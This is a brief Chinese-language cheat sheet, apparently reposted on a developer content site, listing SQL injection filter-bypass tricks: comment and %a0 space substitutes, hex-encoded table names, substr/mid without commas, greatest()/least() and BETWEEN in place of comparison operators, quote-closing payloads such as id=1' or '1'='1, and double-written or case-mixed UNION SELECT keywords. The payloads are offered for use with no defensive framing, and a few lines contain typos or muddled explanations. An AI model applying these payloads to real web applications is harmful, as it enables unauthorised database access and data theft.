SQLbypass技巧

绕过空格(注释符/**/，%a0)

               括号绕过空格 双写

引号绕过(使用十六进制): 

select column_name from information_schema.tables where table_name="users"

select column_name from information_schema.tables where table_name=0x7573657273

逗号绕过(使用from或者offset):

Substr(database(),1,1)  

select substr(database() from 1 for 1);

select mid(database() from 1 for 1);

比较符号(<>)绕过 使用greatest()、least():（前者返回最大值，后者返回最小值）

select*from users where id=1 and ascii(substr(database(),0,1))>64

select*from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

绕过注释符号：#,-- -

通过闭合后面的引号来进行绕过

id=1' union select 1,2,3||'1

id=1' union select 1,2,'3

id=1' where '1'='1

id=1' and '1'='1

id=1' or '1'='1

=绕过 使用like、rlike、reqexp 或者使用<或者>

绕过union，select，where等：

uniounionn:双写绕过union

unionunion

U/**/NION/**/SE/**/LECT/**/user,pwd from user

UniOn:大小写绕过

当比较符号<>被过滤时，也可以用bewteen and进行绕过

Between a and c：返回a和z之间的数据 不包括z

详见sql注入自动化脚本编写

最后

以上就是现实鞋垫为你收集整理的SQLbypass技巧的全部内容，希望文章能够帮你解决SQLbypass技巧所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。